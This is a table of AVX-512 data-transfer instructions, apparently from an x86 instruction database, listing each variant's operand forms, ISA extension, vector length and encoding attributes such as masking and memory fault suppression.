3809 VPMOVDB VPMOVDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3814 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3815 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3816 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3817 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3818 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3819 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3826 VPMOVDW VPMOVDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3827 VPMOVDW VPMOVDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3828 VPMOVDW VPMOVDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3829 VPMOVDW VPMOVDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3830 VPMOVDW VPMOVDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3831 VPMOVDW VPMOVDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3853 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3854 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3855 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3856 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3857 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3858 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3861 VPMOVSDW VPMOVSDW_YMMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3862 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3863 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3864 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3865 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3866 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3897 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3898 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3899 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3900 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3901 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3902 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3937 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3938 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3939 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3940 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3941 VPMOVUSQW VPMOVUSQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3942 VPMOVUSQW VPMOVUSQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3962 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3963 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3964 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3965 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3966 VPMOVUSQB VPMOVUSQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3967 VPMOVUSQB VPMOVUSQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3968 VPMOVUSQD VPMOVUSQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3969 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3970 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3971 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3972 VPMOVUSQD VPMOVUSQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3973 VPMOVUSQD VPMOVUSQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3980 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3981 VPMOVSXDQ VPMOVSXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3982 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3983 VPMOVSXDQ VPMOVSXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3984 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3985 VPMOVSXDQ VPMOVSXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4027 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4028 VMOVDDUP VMOVDDUP_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4029 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4030 VMOVDDUP VMOVDDUP_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4031 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4032 VMOVDDUP VMOVDDUP_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_MOVDDUP MASKOP_EVEX
4045 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4046 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4047 VMOVDQU32 VMOVDQU32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4048 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4049 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4050 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4051 VMOVDQU32 VMOVDQU32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4052 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4053 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4054 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4055 VMOVDQU32 VMOVDQU32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4056 VMOVDQU32 VMOVDQU32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4242 VPMOVD2M VPMOVD2M_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
4243 VPMOVD2M VPMOVD2M_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
4244 VPMOVD2M VPMOVD2M_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
4260 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4261 VPMOVSXBQ VPMOVSXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4262 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4263 VPMOVSXBQ VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4264 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4265 VPMOVSXBQ VPMOVSXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4284 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4285 VPMOVZXBD VPMOVZXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4286 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4287 VPMOVZXBD VPMOVZXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4288 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4289 VPMOVZXBD VPMOVZXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4314 VPMOVB2M VPMOVB2M_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4315 VPMOVB2M VPMOVB2M_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4316 VPMOVB2M VPMOVB2M_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4356 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4357 VMOVSLDUP VMOVSLDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4358 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4359 VMOVSLDUP VMOVSLDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4360 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4361 VMOVSLDUP VMOVSLDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
4375 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4376 VPMOVSXBW VPMOVSXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4377 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4378 VPMOVSXBW VPMOVSXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4379 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4380 VPMOVSXBW VPMOVSXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4422 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4423 VPMOVZXBQ VPMOVZXBQ_ZMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4424 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4425 VPMOVZXBQ VPMOVZXBQ_XMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4426 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4427 VPMOVZXBQ VPMOVZXBQ_YMMi64_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4494 VPMOVW2M VPMOVW2M_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4495 VPMOVW2M VPMOVW2M_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4496 VPMOVW2M VPMOVW2M_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4539 VPMOVM2W VPMOVM2W_XMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4540 VPMOVM2W VPMOVM2W_YMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4541 VPMOVM2W VPMOVM2W_ZMMu16_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4560 VPMOVM2B VPMOVM2B_XMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES:
4561 VPMOVM2B VPMOVM2B_YMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES:
4562 VPMOVM2B VPMOVM2B_ZMMu8_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES:
4577 VPMOVM2D VPMOVM2D_XMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
4578 VPMOVM2D VPMOVM2D_YMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
4579 VPMOVM2D VPMOVM2D_ZMMu32_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
4605 VMOVLHPS VMOVLHPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES:
4671 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4672 VPMOVZXBW VPMOVZXBW_XMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4673 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4674 VPMOVZXBW VPMOVZXBW_YMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4675 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_YMMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4676 VPMOVZXBW VPMOVZXBW_ZMMi16_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4696 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4697 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4698 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4699 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4700 VPMOVSQW VPMOVSQW_XMMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4701 VPMOVSQW VPMOVSQW_MEMi16_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4717 VPMOVSQD VPMOVSQD_YMMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4718 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4719 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4720 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4721 VPMOVSQD VPMOVSQD_XMMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4722 VPMOVSQD VPMOVSQD_MEMi32_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4723 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4724 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_ZMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4725 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4726 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_XMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4727 VPMOVSQB VPMOVSQB_XMMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4728 VPMOVSQB VPMOVSQB_MEMi8_MASKmskw_YMMi64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4735 VPMOVWB VPMOVWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4736 VPMOVWB VPMOVWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4737 VPMOVWB VPMOVWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4738 VPMOVWB VPMOVWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4739 VPMOVWB VPMOVWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
